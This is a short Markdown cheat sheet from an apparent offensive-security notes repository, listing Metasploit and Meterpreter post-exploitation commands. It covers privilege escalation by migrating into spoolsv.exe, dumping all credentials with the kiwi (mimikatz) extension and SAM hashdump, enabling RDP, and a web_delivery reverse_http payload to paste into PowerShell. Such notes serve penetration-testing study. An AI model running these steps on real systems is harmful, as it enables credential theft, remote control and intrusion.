whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/post_exploitation/docs/metasploit.md

1.2 KiB
Raw Blame History

Metasploit

  • -j Run job in background
  • sessions -i 1 interactive session 1

Meterpreter

post/multi/manage/shell_to_meterpreter
  • execute command
  • search files
  • download and upload files

Metasploit after gaining foothold

  • Meterpreter shell is opened on target. Run exploit suggester
run post/multi/recon/local_exploit_suggester
  • Decide on your exploit and background the meterpreter.
  • Use the exploit.
use <path/to/exploit>
  • Fill options like session and run the exploit

Privilege Escalation on Windows Using Metasploit

  • Find process with higher privs and migrate to it. Example spoolsv.exe.
migrate -N spoolsv.exe
  • After NT AUTHORITY\SYSTEM is gained start mimikatz. and dump all creds
load kiwi
help
creds_all
  • Enable RDP via run post/windows/manage/enable_rdp

Hashdump on Windows

  • Meterpreter
run post/windows/gather/hashdump

load kiwi
lsa_dump_sam

Webdelivery

use exploit/multi/script/web_delivery
show targets
set LPORT <attacker-Port>
set PAYLOAD windows/meterpreter/reverse_http
run -j
  • Copy into powershell/cmd